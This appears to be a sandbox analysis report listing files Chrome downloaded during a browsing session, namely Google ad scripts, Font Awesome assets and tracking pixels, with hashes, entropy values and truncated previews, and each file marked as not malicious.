                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR.......s.....(S.....~PLTE.o....<........)w.v...z.o.............._....."r.d.....%t....~..W.....4~......................B..M..O..r.....>...................*....`IDATx....Z.J..P..Q.E.QDm......b.2.D......_..kW..............................................................................................................................................................................................................................................................................................................................s...[....dvq:.^6..jc:../.....}W....q5j.|.......;m....Y{.....lp0.L.....w.'.Wo....#..|.V..U..b..m...kWI..w.1..ut.Q\.,.......O...O.9.]-....l...Z=.*..{....S......u.w..U.Y......-.W......{<]_...u.k.&._..~.E..JI...U?;.....X..J.Uu....,`wjE....r,...N..a...N`.;3.,.j...0.yF`.;..ux................)......0....,x..z.~..8e@....q$......h..p....U.W.....F..s...+.......y0y....K...#..:......u.....V.Xy..N...I.U.3.Z......X.?.5...8...[r.G....u..f.
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1382)
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):17945
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.330388445341784
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:384:AbnElW+CdYyqBFy9G/JtCHAOgRImVWsc5JZB:Ll3CdnqC9ct2A1ImVWsc5h
                                                                                                                                                                                                                                                                                                                      MD5:3B071D5606CC1CF92AE307F5BDB4E540
                                                                                                                                                                                                                                                                                                                      SHA1:E191068CC90E5489130489A1CF173FE50BBA28B8
                                                                                                                                                                                                                                                                                                                      SHA-256:FF3DE130872FE0FB5B770DFA2BC9F0DAF8AB320403A34A60D089436F08D24F99
                                                                                                                                                                                                                                                                                                                      SHA-512:8A1287D7528B2B65D61D6E0A639F2CBE5658AFC3EDB5E2AF9494E8CC876AA6C8060A55D3BD4AA85A0B3B82733E64F7F7A6B4A5F2597FD99FD37136A83A6BBCAD
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://ep2.adtrafficquality.google/sodar/sodar2.js
                                                                                                                                                                                                                                                                                                                      Preview:(function(){'use strict';function aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var k=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ba(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var n=ba(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",r={},u={};function w(a,b,c){if(!c||a!=null){c=u[b];if(c==null)return a[b];c=a[c];return c!==void 0?c:a[b]}}.function x(a,b,c){if(b)a:{var d=a.split(".");a=d.length===1;var g=d[0],f;!a&&g in r?f=r:f=n;for(g=0;g<d.length-1;g++){var e=d[g];if(!(e in f))break a;f=f[e]}d=d[d.length-1];c=p&&c==="es6"?f[d]:null;b=b(c);b!=null&&(a?k(r,d,{configurable:!0,writable:!0,value:b}):b!==c&&(u[d]
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (12736)
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):13165
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.22818331346204
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:192:LO3pHufbPUCpEcrbCpg68vhtz91LO7sgBy70nZbPkks3ZXF1vh3rg1Q5l8hY6o3+:LdACfCghtzb0tnByHVh3s1Q5l8hY+
                                                                                                                                                                                                                                                                                                                      MD5:019CC2AB665A19CB1049E5454E783E72
                                                                                                                                                                                                                                                                                                                      SHA1:94B2233167E4F041C31CBBCDE3DE94DAA4128E47
                                                                                                                                                                                                                                                                                                                      SHA-256:0154DD42BD93330B04AD745C5A8AE3EDF98C343DC1FE40D41C272DF3F5D59DC5
                                                                                                                                                                                                                                                                                                                      SHA-512:722973362B3C0FDD96405401278BD803E86D75C8D610491A94309D84F83AAFC5DDA796CBB8806AB27671EEA20C147124C0E1ADA630B429ED2BD149EEEDE7ECD0
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://kit.fontawesome.com/8ce76d2187.js
                                                                                                                                                                                                                                                                                                                      Preview:window.FontAwesomeKitConfig = {"id":51480605,"version":"6.6.0","token":"8ce76d2187","method":"css","baseUrl":"https://ka-f.fontawesome.com","license":"free","asyncLoading":{"enabled":false},"autoA11y":{"enabled":true},"baseUrlKit":"https://kit.fontawesome.com","detectConflictsUntil":null,"iconUploads":{},"minify":{"enabled":true},"v4FontFaceShim":{"enabled":true},"v4shim":{"enabled":true},"v5FontFaceShim":{"enabled":true}};.!function(t){"function"==typeof define&&define.amd?define("kit-loader",t):t()}((function(){"use strict";function t(t,e){var n=Object.keys(t);if(Object.getOwnPropertySymbols){var r=Object.getOwnPropertySymbols(t);e&&(r=r.filter((function(e){return Object.getOwnPropertyDescriptor(t,e).enumerable}))),n.push.apply(n,r)}return n}function e(e){for(var n=1;n<arguments.length;n++){var o=null!=arguments[n]?arguments[n]:{};n%2?t(Object(o),!0).forEach((function(t){r(e,t,o[t])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(o)):t(O
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):17073
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.01600178254449
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:192:00oGWcc5CnEOrw5IytijuAqfOFk25KBkdOojG6B2/JYAum/DkChjJFk9RR470Gc8:007ICEAwuLBq3yKKKXuck8HCf470o5X
                                                                                                                                                                                                                                                                                                                      MD5:70527DDA47D08745BB078844B9D69C91
                                                                                                                                                                                                                                                                                                                      SHA1:A13B3F1BCA985B1431B5B502BB1E433C27507EE3
                                                                                                                                                                                                                                                                                                                      SHA-256:3F39549AAF4922FF98C6B9F1A763CAD223A3B7748E71DD7CBBDA1D35BC6DA6C9
                                                                                                                                                                                                                                                                                                                      SHA-512:40B625FF9DE13CA981B676CA4EB0FDE85C799DFBE6671FBA877B88E7384DDE09519CBD76ECC8AD33072E1D482E4E0AD6E23C3726BFCEB8ABA29077FAE5BE9134
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:{"sodar_query_id":"PsojZ8G2FfTox_AP4MSRQQ","injector_basename":"sodar2","bg_hash_basename":"LKNVTCBmm8LONMAFh4vZaTIkTKvrw9NCcGbGJBxbjE8","bg_binary":"flRD2H11c0uVfMczVq61MImSUxdCl1ciaOMh9tPBSIqhAodwgxa4xTdeovbjeZfnMlTaoHu9LvoTa+sPNenq6835kLuUWDUHNrqg5WdUJPooGtCxH7RJsykFc1/GQS+IcMp4jLvCfrAg7CTw9fb/yEEiKrP46Ccv8CyuTx2P3dZNT3jPqkxkjVB7yPYpg4eFe+WGmCMQ6Ca0X+OCYBeMVRxUy2kL5iXBuWv99XEQvJfpDrkXwaSAysYfuDDUuVR5srt76kqGl0z0AUSy0MYL2tIXnKcCofIaHmn4LFXP4GxFBBhPrRyJQq1iqew5jjeyTBcYwDvpLPlL2k/CQFNDfzRyDwOLdLFweKEA834yqVFWTSeF8DGpjITXUm+y6R2pE8xXOZa+R7thisVc/nZEgKXm762UVRCizqAw2EKqZq9xzlEx0hkbary/lgbqe4T6DT2saLOuZnZ9ITBSVgcp7Fz5XX/KoTcweV7V+sZWFYcRMyA5g8RiluUtHIK6R1A9DJT/AGQiR2MscdOgKnYIwS+q+7BARoGabTr3KjAs67feu+mgV4h3BDv3hMtgFljEXd3PNsyaMa3i+UW6cPoF9eRGdQogCIy9L+e4y+3j05cPsexXfh0Fen/l/2/Zfp0puaZxjyofAwfkh8uRC6AeLPH27WlrbXSr5ywHOxgxK29xLEKGAI/oPFSf+elBR3giiV8e43FymsVD7Ueucam2E5yXkLrFkrOJQIb7HA7oFURG/CNY0eUNl2akKMhIvumGPLdZFqC0l55vg4K0gPsYJELQs6Af5BpuJDu67gsL7Krm1xwBPomKOxgjXaD5a/zsSNp9jKLCd2Ha7LqmwR
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):170
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                      MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                      SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                      SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                      SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://cm.g.doubleclick.net/pixel?google_nid=adkernel&google_hm=QTg4MzY5Nzg4Njc3OTM0Mzg0NjY&google_push=AXcoOmTePKwToHaeIQGu8M56gWDzY-1geiWnlUHfQIpsbYld60Ki_rzZaP9OaIWvTKZwgr332ljGgxcxDcFPggPWRaGld0nzhuAzAeO9
                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):170
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                      MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                      SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                      SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                      SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://cm.g.doubleclick.net/pixel?google_nid=baidu_mediago&google_push=AXcoOmQzdVcA5PSUWiPvj9qwcPXZXVb8HNbTivNbTzQifDQck24kFKR7TStxtgxFXn-j4k3gshyw_znnZgyV57zTXchMvGa5P0ZnjS-k9g&google_hm=22210ca75dc45a302agr4j00m2xmr4i5
                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (3533)
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):226660
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.451557875371089
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:6144:BFufmdIbWdPP9g+iC+2OSKI4p/hpkWI4jchv:aedIeeScwv
                                                                                                                                                                                                                                                                                                                      MD5:B8F73CA15B82A59E06E0AFD7AFD4732B
                                                                                                                                                                                                                                                                                                                      SHA1:785735EE29AE9815BE63D99530439F698CE08EB9
                                                                                                                                                                                                                                                                                                                      SHA-256:0661EECDC8F9A86CBEAB346D02D85524CFAD9FA7E159EB9B10BDF5F58FFE86F1
                                                                                                                                                                                                                                                                                                                      SHA-512:4C026E1E1DDB622F4578BFEE979FECE8CA2FABE9AD13CD3CDF983B8975EE91339415F73076DBC6407C64CA0B801EA0C18605BE783B30C27212E8AD92E553164F
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://pagead2.googlesyndication.com/pagead/managed/js/activeview/current/ufs_web_display.js
                                                                                                                                                                                                                                                                                                                      Preview:(function(){var n,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");},da=.ca(this),p=function(a,b){if(b)a:{var c=da;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ba(c,a,{configurable:!0,writable:!0,value:b})}};.p("Symbol",function(a){if(a)return a;var b=function(f,g){this.Jg=f;ba(this,"description",{configurable:!0,writable:!0,value:g})};b.prototype.toString=function(){return this.Jg};var c="jscomp_symbol_"+(Math.random()*1E9>>>0)+"_",d=0,e=function(f){if(this instanceof e
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (2586)
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):22560
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.532870375696404
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:384:4qopQl6FtO53n+8svyfxNFo5oeHvVFBIuwRatEDTJi/EDdBC6ZcuLI4Xhw/XgsB6:4qopQlwOFn+DiFoeeFqYt2TJisnC6ZcU
                                                                                                                                                                                                                                                                                                                      MD5:975743BD0AB761EBED37DFDA7FE934E0
                                                                                                                                                                                                                                                                                                                      SHA1:2F2F01248ABA0638DCACEA2081888CF598960991
                                                                                                                                                                                                                                                                                                                      SHA-256:13F3174A49C97770522994A73451F71E77FDE2DC0E3DD7F965E73929C018888D
                                                                                                                                                                                                                                                                                                                      SHA-512:D4B8D5AA631568F43546D82324DF07B6F33112FF7A0DF1930904B2773BD7B478A05720C5CB39AB52B396559C3C8D65BC5FAB2065067DC2DBC9B72245D8ABB495
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://tpc.googlesyndication.com/pagead/js/r20241028/r20110914/client/qs_click_protection_fy2021.js
                                                                                                                                                                                                                                                                                                                      Preview:(function(){'use strict';var aa=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};function ba(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var ca=ba(this); .function da(a,b){if(b)a:{var c=ca;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&aa(c,a,{configurable:!0,writable:!0,value:b})}}da("Symbol.dispose",function(a){return a?a:Symbol("Symbol.dispose")});/* . . Copyright The Closure Library Authors. . SPDX-License-Identifier: Apache-2.0 .*/ .var n=this||self;function ea(a,b,c){return a.call.apply(a.bind,arguments)}function p(a,b,c){p=ea;return p.apply(null,arguments)}function fa(a,b){function c(){}c.pr
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):170
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                      MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                      SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                      SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                      SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):170
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                      MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                      SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                      SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                      SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://cm.g.doubleclick.net/pixel?google_nid=whaleco_services_llc&google_push=AXcoOmSwaAEJs2KOmCEYVvFDTykRMfzP5EgxESu2Kp_CNP1qYCwsJSzte81WmXDP9HOJ6CmStE9CMEmJ5PqfvDw16JSgB3T_dmeec4Dc4Q
                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (608)
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):823
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.079251934712805
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:24:e0vPioGlUrd033xLpxghnd0sH3xtpx2hnd0sQ3rpAhY:dvPioG+d7DDSDDjO
                                                                                                                                                                                                                                                                                                                      MD5:8972AE5004BC634FFA6641BE3960E78A
                                                                                                                                                                                                                                                                                                                      SHA1:235AECDFE4A45217D75FE7ABFBB5B12E3B28CC6E
                                                                                                                                                                                                                                                                                                                      SHA-256:7F264C31CDB355F351235359240C30ACAE2BBE0A43C73FA6A035123E6D953A01
                                                                                                                                                                                                                                                                                                                      SHA-512:F2CD81DC263916A1B47FDBCC58055BA4D3DB4C98FA9E9088776D695457B7BC974F3DFD217389A3E86FED0046313649D3626467AE63502967698406DDA4CFE3C5
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://ka-f.fontawesome.com/releases/v6.6.0/css/free-v5-font-face.min.css?token=8ce76d2187
                                                                                                                                                                                                                                                                                                                      Preview:/*!. * Font Awesome Free 6.6.0 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). * Copyright 2024 Fonticons, Inc.. */@font-face{font-family:"Font Awesome 5 Brands";font-display:block;font-weight:400;src:url(../webfonts/free-fa-brands-400.woff2) format("woff2"),url(../webfonts/free-fa-brands-400.ttf) format("truetype")}@font-face{font-family:"Font Awesome 5 Free";font-display:block;font-weight:900;src:url(../webfonts/free-fa-solid-900.woff2) format("woff2"),url(../webfonts/free-fa-solid-900.ttf) format("truetype")}@font-face{font-family:"Font Awesome 5 Free";font-display:block;font-weight:400;src:url(../webfonts/free-fa-regular-400.woff2) format("woff2"),url(../webfonts/free-fa-regular-400.ttf) format("truetype")}
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (2735)
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):24842
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.536285587605039
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:768:n7xrC/PnLU3EEz0d0Pe49cg/8USqro7Zii4kTIKaJmmUQeG:s7w1pEcK1GmtG
                                                                                                                                                                                                                                                                                                                      MD5:C1BE04166BF406D39CBDF416DBC727EB
                                                                                                                                                                                                                                                                                                                      SHA1:5160F6ACF663F376BFB6CD1CAA38F18BA43E8C8A
                                                                                                                                                                                                                                                                                                                      SHA-256:C584101707A4CBEB1449B2CACB97E75453B6A9CBFF4795B8A6CD89DD555A639D
                                                                                                                                                                                                                                                                                                                      SHA-512:00A987E8621869C7063E6AD44E290AFA6C50E24640280938172D20BC19B44B543D6FA150C707EE487F69DD9A197C3F328B8E8765EA60BB147E430CAD97C49D5D
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://www.gstatic.com/mysidia/c1be04166bf406d39cbdf416dbc727eb.js?tag=addon/exit
                                                                                                                                                                                                                                                                                                                      Preview:(function(){'use strict';/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var q=this||self;function aa(a){q.setTimeout(()=>{throw a;},0)};var ba,ca;a:{for(var da=["CLOSURE_FLAGS"],ea=q,fa=0;fa<da.length;fa++)if(ea=ea[da[fa]],ea==null){ca=null;break a}ca=ea}var ha=ca&&ca[610401301];ba=ha!=null?ha:!1;var r;const ia=q.navigator;r=ia?ia.userAgentData||null:null;function ka(a){return ba?r?r.brands.some(({brand:b})=>b&&b.indexOf(a)!=-1):!1:!1}function y(a){var b;a:{if(b=q.navigator)if(b=b.userAgent)break a;b=""}return b.indexOf(a)!=-1};function A(){return ba?!!r&&r.brands.length>0:!1}function la(){return A()?ka("Chromium"):(y("Chrome")||y("CriOS"))&&!(A()?0:y("Edge"))||y("Silk")};function ma(a){ma[" "](a);return a}ma[" "]=function(){};!y("Android")||la();la();y("Safari")&&(la()||(A()?0:y("Coast"))||(A()?0:y("Opera"))||(A()?0:y("Edge"))||(A()?ka("Microsoft Edge"):y("Edg/"))||A()&&ka("Opera"));let na;function pa(){const a=Error();a.__closure__error__context__
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65321)
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):96614
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.750153610655337
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:1536:EKM1MvMaMfMRQA709/bQZMfjSFOlyPG9zXgRw0D:Z709/UGGFwyPG9zwRw0D
                                                                                                                                                                                                                                                                                                                      MD5:4CA760F49CD8A14911C81E6C14328874
                                                                                                                                                                                                                                                                                                                      SHA1:81687E7A5DBBA470120798CF05DC31E8D57F0B11
                                                                                                                                                                                                                                                                                                                      SHA-256:F99C17690330C805C47DA3D7592864D6ACF0F73817D432447E1B0C66AD28F221
                                                                                                                                                                                                                                                                                                                      SHA-512:BC14B089615EC40F6B031631CA36D75FC55267117BBD7D6DFBE21821DA288E56F2FBDCE920B9984D82D80067C153A8EC43CC664D40853298CF248C0F0F4A278C
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:/*!. * Font Awesome Free 6.6.0 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). * Copyright 2024 Fonticons, Inc.. */.fa{font-family:var(--fa-style-family,"Font Awesome 6 Free");font-weight:var(--fa-style,900)}.fa,.fa-brands,.fa-classic,.fa-regular,.fa-sharp-solid,.fa-solid,.fab,.far,.fas{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:var(--fa-display,inline-block);font-style:normal;font-variant:normal;line-height:1;text-rendering:auto}.fa-classic,.fa-regular,.fa-solid,.far,.fas{font-family:"Font Awesome 6 Free"}.fa-brands,.fab{font-family:"Font Awesome 6 Brands"}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-6x{font-size:6em}.fa-7x{font-size:7em}.fa-8x{font-size:8em}.fa-9x{font-size:9em}.fa-10x{font-size:10em}.fa-2xs{font-size:.625em;line-height:.1em;vertical-align:.225em}.fa-xs{font-size:.75em;
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):170
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                      MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                      SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                      SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                      SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
